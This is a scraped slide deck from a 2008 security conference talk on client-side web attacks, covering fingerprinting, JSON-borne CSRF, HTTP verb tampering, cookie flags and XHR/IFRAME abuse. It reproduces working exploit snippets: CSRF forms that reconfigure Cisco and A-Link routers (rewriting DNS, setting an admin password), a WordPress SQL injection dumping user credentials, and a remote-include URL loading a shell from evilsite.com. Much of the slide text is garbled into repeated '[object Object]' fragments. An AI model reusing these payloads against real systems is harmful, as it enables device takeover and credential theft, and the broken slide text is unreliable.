Hacking Client Side Insecurities

Club-Hack 2008 Aditya K Sood Founder , Sec-Niche Security Hacking Client Side Insecurities

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],$whoami

Hacking Client Side Insecurities Web 2.0 Application Model

Hacking Client Side Insecurities [1] Discovering Clients on Internet / Intranet.  Web Application Discovery Protocol  Fingerprinting Embedded Devices.  Rogue Request for HTTP Server Fingerprinting.  JavaScript Based Client Information Retrieval [2] Client Side Attack Patterns.  Pluggable Protocol Handlers.  JavaScript Jacking  JSON Injections [CSRF]  HTTP Verb Jacking  HTTP Verb Tampering.  Insecure Parametric Design of Cookies  Baking with XSS.  War XHR and IFRAME Exploiting Patterns.  Cross Site Request Forging (Embedded Devices)  The High Risk.  Surf Jacking  Jacking HTTPS in Traffic Pool. [3] Web Virtual Environment [RDP/ CITRIX]. [4] Questions and Answers. $ AGENDA

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Client Side ! Why?

Hacking Client Side Insecurities Discovery

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Fingerprinting ! Why?

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Fingerprinting !

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Fingerprinting !

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],Fingerprinting !

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Fingerprinting ! Potentially a Net Scalar Device

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Fingerprinting ! The Content Parameter is transformed into XONTENT. This is Generally Shown by Potential RADWARE Devices RADWARE Device

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Fingerprinting ! Lets dissect the Pattern of this Number. Convert it into Decimal to see what is there. The Internal IP Dissected is  192.168.1.10 This Layout is specific to Working Devices

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],Fingerprinting !

Hacking Client Side Insecurities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Fingerprinting ! < script language="javascript"> function browserInfo(form) { var txtInfo; txtInfo = "Platform : " + window.navigator.platform + "" + "OSCPU : " + window.navigator.oscpus + "" + "UserAgent : " + window.navigator.userAgent + "" + "Language : " + window.navigator.language + "" + "AppName : " + window.navigator.appName + "" + "AppVersion : " + window.navigator.appVersion + "" + "Product : " + window.navigator.product + "" + "CodeName : " + window.navigator.productSub + "" + "Vendor : " + window.navigator.vendor + "" + "VendorSub : " + window.navigator.vendorSub + "" + "CodeName : " + window.navigator.appCodeName + "" + "History : " + window.history.length + "" + "ScreenW : " + window.screen.width + "" + "ScrrenH : " + window.screen.height; form.txtOutput.value=txtInfo; return; } </script>

Hacking Client Side Insecurities Demonstrations!

Hacking Client Side Insecurities Web Chemistry! Wow!

Hacking Client Side Insecurities Client Side Exploiting Patterns

Hacking Client Side Insecurities Client Side Exploiting Patterns ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Hacking Client Side Insecurities Pluggable Protocol Handlers ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Hacking Client Side Insecurities Java Script Jacking ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Website Requires JavaScript Support. This anatomy works in both positive and negative manner

Hacking Client Side Insecurities Java Script Jacking

Hacking Client Side Insecurities Java Script Jacking – JSON Injections JSON Injections  The Serialization Insecurity | Web 2.0 Direct Injections with Encoding. Everything is treated as String. Apply toJSONObject(). CSRF  A different way to Fuse attack with Notation Objects. { "menu": { "id": "<img src="https://books.example.com/clickbuy?book=ISBNhere&quantity=100">", "value": "<img src="https://trading.example.com/xfer?from=MSFT&to=RHAT&confirm=Y">", "popup": "<scriptsrc="https://www.google.com/accounts/UpdateEmail?service=adsense &Email=mymail@newmail.net&Passwd=cool&save="></script>" } } } Cross Site Request Forgery Structured in JSON – Google Ad sense Layout.

Hacking Client Side Insecurities HTTP Verb Jacking ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Major Flaw  HTTP End Point Check does not Disseminate among HTTP Request. Only Parameter Check is Performed. All Verbs are Allowed. In 2006 , I have released a paper called Rogue XML Specifications which list the potential insecurities in web.xml file. http://packetstormsecurity.org/papers/general/RogueXMLSpecific.pdf

Hacking Client Side Insecurities HTTP Verb Jacking security-constraint> <web-resource-collection> <web-resource-name>drivers</web-resource-name> <description> Security constraint for drivers page </description> <url-pattern>/drivers.html</url-pattern> <http-method>POST</http-method> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <description> constraint for drivers </description> <role-name>manager</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> </login-config> <security-role> <role-name>manager</role-name> The snapshot of web.xml file for a certain target. The security constraint parameter defines the allowed request. The type of Authentication allowed. HTTP Verb Jacking  Manager directories will not be Accessed by GET/POST Request. What about HEAD Request. J2EE ,JSP , ASP , ASP.NET,PHP etc are based on configuration files to process the type of request to handle. [ GET/POST/HEAD etc]

Hacking Client Side Insecurities Insecure Parametric Cookies ,[object Object],[object Object],[object Object],[object Object],Cookie Security Parameter Check ,[object Object],[object Object],[object Object],Cookie Security Parameters are :- Secure ( boolean)  Allowed over only HTTPS. HttpOnly ( boolean )  JavaScript document.cookie Fails.

Hacking Client Side Insecurities XHR and IFRAME ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],If your browser do not support Ajax XHR request and a page is loaded into browser then the most of the remote toolkits have a hidden iframe to provide fake XHR support to the page.

Hacking Client Side Insecurities XHR and IFRAME < script > var oRequest = new XMLHttpRequest(); var sURL = "http://www.snapdrive.net/files/571814/chrome.txt"; alert('Downloading a txt file..please wait.'); oRequest.open("GET",sURL,false); oRequest.setRequestHeader("User-Agent",navigator.userAgent); oRequest.send(null); xmlDoc=oRequest.ResponseText; alert(xmlDoc); if (oRequest.status==200) { alert('Done...now try editing the Text-Box!'); var str=" Winget 3.0 DoS Exploit PoC.Minimize Winget & Right-Click & Copy to clipboard."; document.write(str.link("http://"+oRequest.responseText+".exe")); } else {alert('Error executing XMLHttpRequest call!');} Local Dos [Milw0rm] var iframe = document.createElement("IFRAME"); iframe.setAttribute("src", 'ftp://localhost/anything'); iframe.setAttribute("name", 'myiframe'); iframe.setAttribute("id", 'myiframe'); iframe.setAttribute("onload", 'read_iframe("myiframe")'); iframe.style.width = "100px"; iframe.style.height = "100px"; document.body.appendChild(iframe); Konqueror 3.5.5 Crash [Milw0rm] [Word Press SQL Injection through IFRAME] wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- [PHP Nuke IFRAME] http://www.example.com/nuke_path/iframe.php?file=ftp://user:pass@evilsite.com/public_html/shell.html (or) .htm http://www.milw0rm.com/exploits/6777 http://www.milw0rm.com/exploits/3512

Hacking Client Side Insecurities Embedded Devices - CSRF [1] Cisco Router Remote Administration Execution CSRF Exploit [Milw0rm] < html> <body> <body onload="fdsa.submit();"> <form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http"> <input type=hidden name=command value="alias exec xx xx"> <input type=hidden name=command_url value="/level/15/exec/-"> <input type=hidden name=new_command_url value="/level/15/configure/-"> </body> </html> [3] EXPLAY CMS CSRF Exploit <img src="http://explay.localhost/admin.php?name =users&page=1&order=user_id&set_admin=2" /> [2] A-Link WL54AP3 and WL54AP2 CSRF [Milw0rm] <html> <body onload="document.wan.submit(); document.password.submit()"> <form action="http://192.168.1.254/goform/formWanTcpipSetup" method="post" name="wan"> <input type="hidden" value="dnsManual" name="dnsMode" checked> <input type="hidden" name="dns1" value="216.239.32.10"> <input type="hidden" name="dns2" value="216.239.32.10"> <input type="hidden" name="dns3" value="216.239.32.10"> <input type="hidden" name="webWanAccess" value="ON" checked="checked"> </form> <form action="http://192.168.1.254/goform/formPasswordSetup" method="post" name="password"> <input type="hidden" name="username" value="mallory"> <input type="hidden" name="newpass" value="gotroot"> <input type="hidden" name="confpass" value="gotroot"> </form> </body> </html>

Hacking Client Side Insecurities SURF Jacking – HTTPS at Stake ,[object Object],[object Object],[object Object],[object Object],Side Jacking discovered by Errata Security. Surf Jacking discovered by Enable Security But Cookie Insecurity is known back time. Greets to break down into Attacks.

Hacking Client Side Insecurities RDP / ICA – Command Execution ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Hacking Client Side Insecurities RDP / ICA ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Hacking Client Side Insecurities Attack Point - ICA ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Hacking Client Side Insecurities Attack Point - RDP ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Hacking Client Side Insecurities Questions

Hacking Client Side Insecurities Thanks and Regards

Hacking Client Side Insecurities SecNiche Security http://www.secniche.org

Hacking Client Side Insecurities

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (20)

Similaire à Hacking Client Side Insecurities

Similaire à Hacking Client Side Insecurities (20)

Plus de amiable_indian

Plus de amiable_indian (20)

Dernier

Dernier (20)

Hacking Client Side Insecurities